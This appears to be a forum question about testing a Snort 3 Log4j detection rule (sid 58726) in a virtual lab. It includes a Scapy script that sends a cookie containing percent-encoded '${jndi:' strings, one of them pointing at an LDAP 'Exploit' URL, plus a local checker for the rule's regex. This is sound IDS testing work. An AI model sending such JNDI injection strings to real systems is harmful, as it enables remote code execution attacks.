I am trying to trigger a Snort 3 IDS rule using the Python Scapy 2.5 library. The rule expects to see a specific HTTP cookie value. When testing, the HTTP request is sent to an HTTP listener that Snort sits in front of. I receive a 200 response from the listener, but the rule is not triggered. This is in a virtual lab environment.
Here is the Python code that generates the request, in which you can see that I tried several values to try to match the rule's regular expression:
```python
import logging
import socket
from scapy.all import *
from scapy.layers.http import HTTPRequest

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

target_ip = "192.168.208.167"
target_port = 80

# The cookie value to trigger the Snort rule with sid 58726 and rev 6
cookie_name = "jndi"
cookie_value = "%24%7Bjndi%3A"
#cookie_value = "${jndi:"
#cookie_value = 'test%24%7Bjndi%3Aldap%3A//test.example.com%3A389/Exploit%7D'
#cookie_value = "%24%7Bjndi%3Aldap%3A%2F%2Ftest.example.com%3A389%2FExploit%7D"


def send_request(cookie_name, cookie_value):
    # Build the request with Scapy's HTTP layer; header values are bytes
    http_request = HTTPRequest(
        Method=b"GET",
        Path=b"/",
        Host=bytes(target_ip, encoding="utf-8"),
        User_Agent=b"Mozilla/5.0",
        Accept=b"*/*",
        Connection=b"keep-alive",
        Cookie=f"{cookie_name}={cookie_value}".encode("utf-8"),
    )
    # Serialise the layer and send it over a normal TCP socket, so the OS does
    # the three-way handshake (the rule requires flow:to_server,established)
    http_request_raw = raw(http_request)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_ip, target_port))
    sock.sendall(http_request_raw)
    response = sock.recv(4096)
    sock.close()
    print(response)
    # Reaching this line only means the request was sent and answered,
    # not that Snort actually alerted on it
    print("Triggered Snort rule with sid: 58726, rev: 6")


send_request(cookie_name, cookie_value)
```
Here is the Snort rule:

```
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-OTHER Apache Log4j logging remote code execution attempt"; flow:to_server,established; content:"jndi",fast_pattern,nocase; http_cookie; content:"jndi",nocase; pcre:"/(%(25)?24|\x24)(%(25)?7b|\x7b)jndi(%(25)?3a|\x3a)/i"; metadata:policy balanced-ips drop,policy connectivity-ips drop,policy max-detect-ips drop,policy security-ips drop,ruleset community; service:http; reference:cve,2021-44228; reference:cve,2021-44832; reference:cve,2021-45046; reference:cve,2021-45105; classtype:attempted-user; sid:58726; rev:6; )
```
Here is the HTTP stream as shown by Wireshark:

```
GET / HTTP/1.1
Accept: */*
Connection: keep-alive
Cookie: jndi=%24%7Bjndi%3A
Host: 192.168.208.167
User-Agent: Mozilla/5.0

HTTP/1.1 200 OK
Date: Tue, 09 May 2023 14:03:44 GMT
Content-Type: text/html
Content-Length: 258
Connection: Close
Server: INetSim HTTP Server

<html>
<head>
<title>INetSim default HTML page</title>
</head>
<body>
<p></p>
<p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p>
<p align="center">This file is an HTML document.</p>
</body>
</html>
```
Any thoughts on why the request did not trigger the Snort rule?
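As an added check (not part of the question), the script below replays the rule's cookie-buffer constraints, the `content:"jndi",nocase` match and the `pcre`, against a raw request so a candidate cookie value can be validated locally before it is sent to the lab; the percent-decoded pass reflects an assumption that Snort 3 may normalize the `http_cookie` buffer, which the question does not establish, and the parser and sample request are constructed here.

```python
import re
from typing import Dict, Optional
from urllib.parse import unquote

# The pcre from Snort rule sid 58726 rev 6 as quoted in the question (flag /i)
RULE_PCRE = re.compile(
    r"(%(25)?24|\x24)(%(25)?7b|\x7b)jndi(%(25)?3a|\x3a)", re.IGNORECASE
)


def cookie_header_value(raw_request: bytes) -> Optional[str]:
    """Pull the Cookie header value out of a raw HTTP/1.1 request.
    Minimal constructed parser, not Snort's http_inspect."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"cookie":
            return value.strip().decode("latin-1")
    return None


def rule_checks(cookie: str) -> Dict[str, Dict[str, bool]]:
    """Apply the rule's two cookie-buffer tests to the raw cookie and to a
    percent-decoded copy (assumed normalized form of the http_cookie buffer)."""
    results = {}
    for label, buf in (("raw", cookie), ("percent_decoded", unquote(cookie))):
        results[label] = {
            "content_jndi": "jndi" in buf.lower(),   # content:"jndi",nocase
            "pcre": RULE_PCRE.search(buf) is not None,
        }
    return results


def would_match(raw_request: bytes) -> bool:
    """True if either buffer form satisfies both the content and pcre tests."""
    cookie = cookie_header_value(raw_request)
    if cookie is None:
        return False
    return any(r["content_jndi"] and r["pcre"] for r in rule_checks(cookie).values())


# Constructed sample: the request from the question's Wireshark capture
SAMPLE_REQUEST = (
    b"GET / HTTP/1.1\r\nAccept: */*\r\nConnection: keep-alive\r\n"
    b"Cookie: jndi=%24%7Bjndi%3A\r\nHost: 192.168.208.167\r\n"
    b"User-Agent: Mozilla/5.0\r\n\r\n"
)

if __name__ == "__main__":
    print(rule_checks(cookie_header_value(SAMPLE_REQUEST)))
    print("rule constraints satisfied:", would_match(SAMPLE_REQUEST))
```

If this reports a match for a value that Snort still does not alert on, the cookie content itself is not the problem and the remaining differences lie in the rule's other conditions (`$HOME_NET`/`$EXTERNAL_NET`, `$HTTP_PORTS`, `flow:established`) or in whether the rule is enabled in the active policy.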